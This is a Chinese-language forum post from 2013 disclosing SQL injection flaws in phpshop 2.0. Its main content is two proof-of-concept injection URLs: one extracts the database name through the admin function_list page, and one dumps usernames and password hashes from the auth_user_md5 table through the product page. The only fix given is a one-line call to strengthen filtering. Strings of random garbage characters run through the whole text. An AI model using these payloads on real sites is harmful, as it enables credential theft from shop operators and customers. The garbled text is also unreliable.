标题 : phpshop 2.0 SQL Injection Vulnerability
8 b. U2 F- `- B$ j" n/ L2 U6 S
, h# N# `) p: l% A7 b! |作者 : By onestree8 P& x+ u% Q) t6 N4 d' n" ?
下载地址 : http://code.google.com/p/phpshop/downloads/list0 R# B* m$ ], C5 b! N* Y
测试地址: windows 7 / ubuntu5 F/ t( E1 x, F( y& B
) P S$ f1 J/ Z& x7 [, R
8 O$ [& k0 Q) `+ Q& R8 G3 l4 c
SQLi p0c:& J% [5 n9 @/ _+ }1 `6 u6 u9 n
5 G4 j6 Z. j. m3 O% w
==================/ h s A( {- h: W
1 L# j C' x7 e1 i9 q+ q4 w
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'' r2 }! h: A0 h/ r- K6 P* Q
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --+ g5 e" M2 G4 P$ h
( A8 E; [; M8 J0 L, j( |http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
8 ]4 C8 T: G$ G B
5 ^6 U! F, [% R+ D, q" s" K修复:4 }: m) A2 I( v( y. }& f
加强过滤
7 Q6 r; t& _& n8 E8 v9 [! V& ]5 L+ K* }' P
3 J+ D' b, z7 _$ l2 s* v: ]5 o9 x
|
发表于 2013-1-18 18:24:10
收藏
支持
反对